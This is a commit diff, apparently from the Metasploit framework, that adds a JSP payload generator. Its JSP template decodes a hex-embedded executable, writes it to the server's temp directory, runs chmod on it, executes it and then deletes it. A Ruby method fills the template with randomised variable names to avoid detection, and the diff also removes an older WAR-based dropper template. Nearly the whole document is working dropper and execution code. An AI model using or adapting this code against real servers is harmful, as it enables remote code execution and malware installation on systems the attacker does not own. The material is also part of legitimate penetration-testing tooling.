Land #7283, add jsp payload generator
commit
4c4f2e45d6
|
@ -0,0 +1,38 @@
|
|||
<%%@ page import="java.io.*" %%>
|
||||
<%%
|
||||
String %{var_payload} = "%{payload}";
|
||||
String %{var_exepath} = System.getProperty("java.io.tmpdir") + "/%{var_exe}";
|
||||
|
||||
if (System.getProperty("os.name").toLowerCase().indexOf("windows") != -1) {
|
||||
%{var_exepath} = %{var_exepath}.concat(".exe");
|
||||
}
|
||||
|
||||
int %{var_payloadlength} = %{var_payload}.length();
|
||||
byte[] %{var_bytes} = new byte[%{var_payloadlength}/2];
|
||||
for (int %{var_counter} = 0; %{var_counter} < %{var_payloadlength}; %{var_counter} += 2) {
|
||||
%{var_bytes}[%{var_counter} / 2] = (byte) ((Character.digit(%{var_payload}.charAt(%{var_counter}), 16) << 4)
|
||||
+ Character.digit(%{var_payload}.charAt(%{var_counter}+1), 16));
|
||||
}
|
||||
|
||||
FileOutputStream %{var_outputstream} = new FileOutputStream(%{var_exepath});
|
||||
%{var_outputstream}.write(%{var_bytes});
|
||||
%{var_outputstream}.flush();
|
||||
%{var_outputstream}.close();
|
||||
|
||||
if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1){
|
||||
String[] %{var_fperm} = new String[3];
|
||||
%{var_fperm}[0] = "chmod";
|
||||
%{var_fperm}[1] = "+x";
|
||||
%{var_fperm}[2] = %{var_exepath};
|
||||
Process %{var_proc} = Runtime.getRuntime().exec(%{var_fperm});
|
||||
if (%{var_proc}.waitFor() == 0) {
|
||||
%{var_proc} = Runtime.getRuntime().exec(%{var_exepath});
|
||||
}
|
||||
|
||||
File %{var_fdel} = new File(%{var_exepath}); %{var_fdel}.delete();
|
||||
} else {
|
||||
String[] %{var_exepatharray} = new String[1];
|
||||
%{var_exepatharray}[0] = %{var_exepath};
|
||||
Process %{var_proc} = Runtime.getRuntime().exec(%{var_exepatharray});
|
||||
}
|
||||
%%>
|
|
@ -1,51 +0,0 @@
|
|||
<%%@ page import="java.io.*" %%>
|
||||
<%%
|
||||
String %{var_hexpath} = application.getRealPath("/") + "/%{var_hexfile}.txt";
|
||||
String %{var_exepath} = System.getProperty("java.io.tmpdir") + "/%{var_exe}";
|
||||
String %{var_data} = "";
|
||||
|
||||
if (System.getProperty("os.name").toLowerCase().indexOf("windows") != -1)
|
||||
{
|
||||
%{var_exepath} = %{var_exepath}.concat(".exe");
|
||||
}
|
||||
|
||||
FileInputStream %{var_inputstream} = new FileInputStream(%{var_hexpath});
|
||||
FileOutputStream %{var_outputstream} = new FileOutputStream(%{var_exepath});
|
||||
|
||||
int %{var_numbytes} = %{var_inputstream}.available();
|
||||
byte %{var_bytearray}[] = new byte[%{var_numbytes}];
|
||||
%{var_inputstream}.read(%{var_bytearray});
|
||||
%{var_inputstream}.close();
|
||||
byte[] %{var_bytes} = new byte[%{var_numbytes}/2];
|
||||
for (int %{var_counter} = 0; %{var_counter} < %{var_numbytes}; %{var_counter} += 2)
|
||||
{
|
||||
char %{var_char1} = (char) %{var_bytearray}[%{var_counter}];
|
||||
char %{var_char2} = (char) %{var_bytearray}[%{var_counter} + 1];
|
||||
int %{var_comb} = Character.digit(%{var_char1}, 16) & 0xff;
|
||||
%{var_comb} <<= 4;
|
||||
%{var_comb} += Character.digit(%{var_char2}, 16) & 0xff;
|
||||
%{var_bytes}[%{var_counter}/2] = (byte)%{var_comb};
|
||||
}
|
||||
|
||||
%{var_outputstream}.write(%{var_bytes});
|
||||
%{var_outputstream}.close();
|
||||
|
||||
if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1){
|
||||
String[] %{var_fperm} = new String[3];
|
||||
%{var_fperm}[0] = "chmod";
|
||||
%{var_fperm}[1] = "+x";
|
||||
%{var_fperm}[2] = %{var_exepath};
|
||||
Process %{var_proc} = Runtime.getRuntime().exec(%{var_fperm});
|
||||
if (%{var_proc}.waitFor() == 0) {
|
||||
%{var_proc} = Runtime.getRuntime().exec(%{var_exepath});
|
||||
}
|
||||
|
||||
File %{var_fdel} = new File(%{var_exepath}); %{var_fdel}.delete();
|
||||
}
|
||||
else
|
||||
{
|
||||
String[] %{var_exepatharray} = new String[1];
|
||||
%{var_exepatharray}[0] = %{var_exepath};
|
||||
Process %{var_proc} = Runtime.getRuntime().exec(%{var_exepatharray});
|
||||
}
|
||||
%%>
|
|
@ -1407,6 +1407,40 @@ require 'msf/core/exe/segment_appender'
|
|||
read_replace_script_template("to_powershell.hta.template", hash_sub)
|
||||
end
|
||||
|
||||
def self.to_jsp(exe)
|
||||
hash_sub = {}
|
||||
hash_sub[:var_payload] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_exepath] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_outputstream] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_payloadlength] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_bytes] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_counter] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_exe] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_proc] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_fperm] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_fdel] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_exepatharray] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
|
||||
payload_hex = exe.unpack('H*')[0]
|
||||
hash_sub[:payload] = payload_hex
|
||||
|
||||
read_replace_script_template("to_exe.jsp.template", hash_sub)
|
||||
end
|
||||
|
||||
# Creates a Web Archive (WAR) file containing a jsp page and hexdump of a
|
||||
# payload. The jsp page converts the hexdump back to a normal binary file
|
||||
# and places it in the temp directory. The payload file is then executed.
|
||||
#
|
||||
# @see to_war
|
||||
# @param exe [String] Executable to drop and run.
|
||||
# @param opts (see to_war)
|
||||
# @option opts (see to_war)
|
||||
# @return (see to_war)
|
||||
def self.to_jsp_war(exe, opts = {})
|
||||
template = self.to_jsp(exe)
|
||||
self.to_war(template, opts)
|
||||
end
|
||||
|
||||
def self.to_win32pe_vbs(framework, code, opts = {})
|
||||
to_exe_vbs(to_win32pe(framework, code, opts), opts)
|
||||
end
|
||||
|
@ -1500,52 +1534,6 @@ require 'msf/core/exe/segment_appender'
|
|||
zip.pack
|
||||
end
|
||||
|
||||
# Creates a Web Archive (WAR) file containing a jsp page and hexdump of a
|
||||
# payload. The jsp page converts the hexdump back to a normal binary file
|
||||
# and places it in the temp directory. The payload file is then executed.
|
||||
#
|
||||
# @see to_war
|
||||
# @param exe [String] Executable to drop and run.
|
||||
# @param opts (see to_war)
|
||||
# @option opts (see to_war)
|
||||
# @return (see to_war)
|
||||
def self.to_jsp_war(exe, opts = {})
|
||||
# begin <payload>.jsp
|
||||
hash_sub = {}
|
||||
hash_sub[:var_hexpath] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_exepath] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_data] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_inputstream] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_outputstream] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_numbytes] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_bytearray] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_bytes] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_counter] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_char1] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_char2] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_comb] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_exe] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_hexfile] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_proc] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_fperm] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_fdel] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_exepatharray] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
|
||||
# Specify the payload in hex as an extra file..
|
||||
payload_hex = exe.unpack('H*')[0]
|
||||
opts.merge!(
|
||||
{
|
||||
:extra_files =>
|
||||
[
|
||||
[ "#{hash_sub[:var_hexfile]}.txt", payload_hex ]
|
||||
]
|
||||
})
|
||||
|
||||
template = read_replace_script_template("to_exe_jsp.war.template", hash_sub)
|
||||
|
||||
self.to_war(template, opts)
|
||||
end
|
||||
|
||||
# Creates a .NET DLL which loads data into memory
|
||||
# at a specified location with read/execute permissions
|
||||
# - the data will be loaded at: base+0x2065
|
||||
|
@ -2221,6 +2209,12 @@ require 'msf/core/exe/segment_appender'
|
|||
when 'loop-vbs'
|
||||
exe = exe = to_executable_fmt(framework, arch, plat, code, 'exe-small', exeopts)
|
||||
Msf::Util::EXE.to_exe_vbs(exe, exeopts.merge({ :persist => true }))
|
||||
when 'jsp'
|
||||
arch ||= [ ARCH_X86 ]
|
||||
tmp_plat = plat.platforms if plat
|
||||
tmp_plat ||= Msf::Module::PlatformList.transform('win')
|
||||
exe = Msf::Util::EXE.to_executable(framework, arch, tmp_plat, code, exeopts)
|
||||
Msf::Util::EXE.to_jsp(exe)
|
||||
when 'war'
|
||||
arch ||= [ ARCH_X86 ]
|
||||
tmp_plat = plat.platforms if plat
|
||||
|
@ -2258,6 +2252,7 @@ require 'msf/core/exe/segment_appender'
|
|||
"exe-small",
|
||||
"hta-psh",
|
||||
"jar",
|
||||
"jsp",
|
||||
"loop-vbs",
|
||||
"macho",
|
||||
"msi",
|
||||
|
|
Loading…
Reference in New Issue